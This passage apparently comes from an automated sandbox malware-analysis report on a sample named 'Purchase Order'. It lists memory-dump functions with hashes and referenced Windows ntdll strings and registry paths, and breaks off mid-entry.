                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: 979794d706be1b67d50eb210a02a12e052edc34b0953d7d438ff654c796f60a2
                                            • Instruction ID: 0d48b08851218edeb5dd457ed77619b3d7e6acbcec1995483833d642a036e008
                                            • Opcode Fuzzy Hash: 979794d706be1b67d50eb210a02a12e052edc34b0953d7d438ff654c796f60a2
                                            • Instruction Fuzzy Hash: A671EF74609305DFE300DF24D980A4BBBE9FF88658F504B9DE4A9472A0CB70D906CF92
                                            Function 348FB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            • GlobalizationUserSettings, xrefs: 348FB834
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 348FB82A
                                            • TargetNtPath, xrefs: 348FB82F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: e201609535217f66b74495592af4c8cd371550359dba0602c1151c3b9e0515d8
                                            • Instruction ID: e4565ece8aca5b55d04a9c3c6ae3cfce9bfc780d400aa663f3190cd10ae47f72
                                            • Opcode Fuzzy Hash: e201609535217f66b74495592af4c8cd371550359dba0602c1151c3b9e0515d8
                                            • Instruction Fuzzy Hash: 99619172A01628AFEB31DF58DC88BD9B7B8EF04750F4102E9A508A7650DB75DE84CF90
                                            Function 3481F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3487E6C6
                                            • HEAP[%wZ]: , xrefs: 3487E6A6
                                            • HEAP: , xrefs: 3487E6B3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 7566c08f4fb17b336a3853be8b1749c75e97f8d0043ed171c0cbf212c10ac0a2
                                            • Instruction ID: 665fbfd92b2bca46e55b97148097c8808458636bbff7c05f78e9d29ba9c68a56
                                            • Opcode Fuzzy Hash: 7566c08f4fb17b336a3853be8b1749c75e97f8d0043ed171c0cbf212c10ac0a2
                                            • Instruction Fuzzy Hash: 3F51E175704B88EFE312CBA8C894B96BBF8EF05344F0402A6E650DB692D774E941DB50
                                            Function 348415F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpCompleteMapModule, xrefs: 3488A590
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 3488A589
                                            • minkernel\ntdll\ldrmap.c, xrefs: 3488A59A
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: d7f4aaf26f8d91daef5bfda7b3d5aff852ed7405d4cbc811a36b85d7e796584c
                                            • Instruction ID: 2879498ec404e290a3f0b58098687c8db9b5d3f34bb00f568525f6a2687b08c3
                                            • Opcode Fuzzy Hash: d7f4aaf26f8d91daef5bfda7b3d5aff852ed7405d4cbc811a36b85d7e796584c
                                            • Instruction Fuzzy Hash: D351CEB87007499FF711CA69C988B4ABBE8EB00754F1803A9E9619B7E1DB74ED41CB44
                                            Function 3481758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: f2954d91bc775cbf8b1dc04b8f7bb843e60ed8d8e8bbedd6580ab945a40ec3f7
                                            • Instruction ID: 282ccac8b29463f97a5fb6ee93de1d4084d6afda0ed75769755efecedc50efea
                                            • Opcode Fuzzy Hash: f2954d91bc775cbf8b1dc04b8f7bb843e60ed8d8e8bbedd6580ab945a40ec3f7
                                            • Instruction Fuzzy Hash: EB4124B93003808FFB15DA5CC4E0BAA7BE4DF45384F5487AED8468B246DA76D886CB51
                                            Function 348516CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpAllocateTls, xrefs: 34891B40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 34891B4A
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34891B39
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: b4236fc939f1260bc9c1c32e1233d4e3265ca94689781ddf2b3fcd4f03377bbf
                                            • Instruction ID: ef473576384fe0b74d1afd0d39beafd3650d613c55cb03b1988dbf5f171e44de
                                            • Opcode Fuzzy Hash: b4236fc939f1260bc9c1c32e1233d4e3265ca94689781ddf2b3fcd4f03377bbf
                                            • Instruction Fuzzy Hash: C54178B9E01608EFEB15CFA8C840AAEBBF5FF48714F508259E415A7754DB74A841CF90
                                            Function 348D5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 2994545307-964947082
                                            • Opcode ID: 4b00c6b81ffa92080252dbfb5333b8ba14b416d68e24f43a81277018552e8e15
                                            • Instruction ID: c1d129c1b4c83ea67fa12aab8f6747db46b77118017c8b5d48d7f18ae4177b03
                                            • Opcode Fuzzy Hash: 4b00c6b81ffa92080252dbfb5333b8ba14b416d68e24f43a81277018552e8e15
                                            • Instruction Fuzzy Hash: 9841D0B9A07248EFE750CF98C980F6A7BB8EF0A350F40025FE925AB251C670DD49CB54
                                            Function 348533A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlCreateActivationContext, xrefs: 348929F9
                                            • Actx , xrefs: 348533AC
                                            • SXS: %s() passed the empty activation context data, xrefs: 348929FE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: 983b087c60e7d044df175887c4f3036ecf5c2a0a0db6d782b07fcb11944544ad
                                            • Instruction ID: 2ab629a56fc6fe2bf962e08996ea8c7c01d6f34e62662133eee2aa3b1955833c
                                            • Opcode Fuzzy Hash: 983b087c60e7d044df175887c4f3036ecf5c2a0a0db6d782b07fcb11944544ad
                                            • Instruction Fuzzy Hash: 67311273610705EFEB12CE98D880F9637E5EB44760F418AA9ED04EF291CB70D841CB90
                                            Function 348AB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 348AB632
                                            • @, xrefs: 348AB670
                                            • GlobalFlag, xrefs: 348AB68F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: ba07dcc51792b6dc1261c50032c1475e98ae9547e08ea3bef7d95953ef9ea772
                                            • Instruction ID: f45921f5d849d19a8f0e9437236344b02e5668c4f9003dc6eedc32bf5980b6c9
                                            • Opcode Fuzzy Hash: ba07dcc51792b6dc1261c50032c1475e98ae9547e08ea3bef7d95953ef9ea772
                                            • Instruction Fuzzy Hash: 9E315CB5E00209AFEB00EF98DC80AEEBB78EF44744F540569EA15A7250D7B49E04CBA4
                                            Function 348C13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                            • API String ID: 0-1050206962
                                            • Opcode ID: 0d7410a55f9f7a3a6e452b8df2467c1b40eaa910565519f4db9c714cb205cec2
                                            • Instruction ID: 80ac67794ce3acf2e7a7e5ee49c825ab8d36790be9b685f8ed6ecf973fb1105f
                                            • Opcode Fuzzy Hash: 0d7410a55f9f7a3a6e452b8df2467c1b40eaa910565519f4db9c714cb205cec2
                                            • Instruction Fuzzy Hash: 72317C72D01619EFEB12DF94CC80EAEFBBDEB44658F4146A5EA14A7210D778DD048FA0
                                            Function 34851607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                            Download Yara Rule
                                            Strings
                                            • DLL "%wZ" has TLS information at %p, xrefs: 34891A40
                                            • minkernel\ntdll\ldrtls.c, xrefs: 34891A51
                                            • LdrpInitializeTls, xrefs: 34891A47
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-931879808
                                            • Opcode ID: 394d3f82437ac36a7e20449f71d72ba6b6823c69c558be09648f46458a3c86b5
                                            • Instruction ID: 72756e0e4f4d20e4099ad73d683eb5d80d31c377dcf5f76bcaa855d269fd061a
                                            • Opcode Fuzzy Hash: 394d3f82437ac36a7e20449f71d72ba6b6823c69c558be09648f46458a3c86b5
                                            • Instruction Fuzzy Hash: BE31DF75E14304EFF7108B58CC85FAA7AE8FB457A4F460399E500B76A0DBB0AD41CB94
                                            Function 34861270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 348612A5
                                            • BuildLabEx, xrefs: 3486130F
                                            • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3486127B
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 991d7967f58c5eb18215c5efcf2cb3dc5d1164b21c126946437f6540f9e1c90c
                                            • Instruction ID: d1657567f41c8f47bca368a92e8b7461e60c7f7021e6ebe59377a57140e9b186
                                            • Opcode Fuzzy Hash: 991d7967f58c5eb18215c5efcf2cb3dc5d1164b21c126946437f6540f9e1c90c
                                            • Instruction Fuzzy Hash: 2A31E47290061CEFEB51DF99CD40EDEBBBDEB84758F004225E616A7260D778DA05CB90
                                            Function 348174B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: RtlValidateHeap
                                            • API String ID: 3446177414-1797218451
                                            • Opcode ID: c07796e9adff0bb5c43269584a34cda1c5c0ffbb04a03b35237abceb1a9da57e
                                            • Instruction ID: 3a4c9b9b1af2fd20c40350fcc249f1b42cb10f32b6a8686534096ff8aecd8100
                                            • Opcode Fuzzy Hash: c07796e9adff0bb5c43269584a34cda1c5c0ffbb04a03b35237abceb1a9da57e
                                            • Instruction Fuzzy Hash: 9841C176B05349DFEB02CF68C4A07EDBBA2FF45614F04835DD8626B280CB359941DB90
                                            Function 34827703 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a01259834b697bffc79306140c8cf6d34e2d0ebd49bc045bd9dadcc01df89e7
                                            • Instruction ID: 5588f0396b866c6c62c73c6572be5d46192dbf6a88de3bf553f501e89ce9ec75
                                            • Opcode Fuzzy Hash: 7a01259834b697bffc79306140c8cf6d34e2d0ebd49bc045bd9dadcc01df89e7
                                            • Instruction Fuzzy Hash: EF614F75E05606EFEB08CF79C480A9DFBB5FF88240F14826AD419A7350DB74A981CBD4
                                            Function 348352A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 4513a9d898fbb4aa6e6a3fbd90173c5ad65ab9f56a79bf0ca2a971d0577f80ce
                                            • Instruction ID: 83bf39447657c786d8aac31b232973fa53e1c55a45e38eb5e3fa61a6ba1d4210
                                            • Opcode Fuzzy Hash: 4513a9d898fbb4aa6e6a3fbd90173c5ad65ab9f56a79bf0ca2a971d0577f80ce
                                            • Instruction Fuzzy Hash: C532CEB860A3158FD765CF18C490B2FB7E5EF88784F504A1EF8959B2A0E774D940CB92
                                            Function 34825702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 0928afdbf15f504d21477e13dc07f912808d108c8d0a6d90ee6b75f356e6bd16
                                            • Instruction ID: d61915dca91b62d2d5405d2c79108b48352ef938422a1ef31ee6c284e56bfa6a
                                            • Opcode Fuzzy Hash: 0928afdbf15f504d21477e13dc07f912808d108c8d0a6d90ee6b75f356e6bd16
                                            • Instruction Fuzzy Hash: 7331D235742B0AEFE7819F64CE40A89F7A9FF44354F404225D91097A50DBB0E8A0DBD0
                                            Function 34855CC0 Relevance: 2.7, Strings: 2, Instructions: 241COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$TargetPath
                                            • API String ID: 0-4164548946
                                            • Opcode ID: 7f787470cbab6fa4acd4ec02e3db44aa837aa38058d91b4648b1f8b68807874c
                                            • Instruction ID: 17fb0d2387080805b33a3ea37692290a05173953f23deb789cc422f7a0d977a4
                                            • Opcode Fuzzy Hash: 7f787470cbab6fa4acd4ec02e3db44aa837aa38058d91b4648b1f8b68807874c
                                            • Instruction Fuzzy Hash: 74812076A05B06DFE750CF18C894A9BB7E8FB88358F454B6DE9459B220D335DC05CB82
                                            Function 348ABC10 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                            • API String ID: 0-4122831824
                                            • Opcode ID: 774c6b894f6a1bef29758d74b96144a0393cef1931f0b1206639e14be3508748
                                            • Instruction ID: ced4b311446c37e23b25b73d38de87e4215b5bb29e29fea6b03f57064a915ebf
                                            • Opcode Fuzzy Hash: 774c6b894f6a1bef29758d74b96144a0393cef1931f0b1206639e14be3508748
                                            • Instruction Fuzzy Hash: F391BE755247419FD710CF28C880B6BB7E4EB88764F100B2EE6A5CB290EBB4D945CB52
                                            Function 3483F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: e5e87763563502b0ff9aefd684dfc0b899d3c4633e6523aea97d539b22868a1a
                                            • Instruction ID: 879edff9450631fc0d91cc9d2959dbb2e21f809c70cf718a2aaf14dc0d11d464
                                            • Opcode Fuzzy Hash: e5e87763563502b0ff9aefd684dfc0b899d3c4633e6523aea97d539b22868a1a
                                            • Instruction Fuzzy Hash: B461BD79A06749DFEB21CFA8C580B9DBBB1FF48708F104269D6256B740CBB4A941DBD0
                                            Function 348B35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 8cd94a0459c7ad545084610bc674d8a6f8c019d39c07a475e829c2ea8ee5c2a1
                                            • Instruction ID: 37e10fb175953d6e524b5e3987407e747c9ced03893bafdfc65a0df7d8cfbbff
                                            • Opcode Fuzzy Hash: 8cd94a0459c7ad545084610bc674d8a6f8c019d39c07a475e829c2ea8ee5c2a1
                                            • Instruction Fuzzy Hash: 9531CF75209741DFE701CB28D844B1AB7E4EF8A750F040A6DF894CB390EBB8D905CB92
                                            Function 348534B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 34892A90
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34892A95
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: 8d674899108f1cad0d4101723b1c50e68a56c183cbd45222de42c3d9260aa338
                                            • Instruction ID: d448992479d2f76e3c8ed17109a76618dd00212d26e6211c644197582854cd82
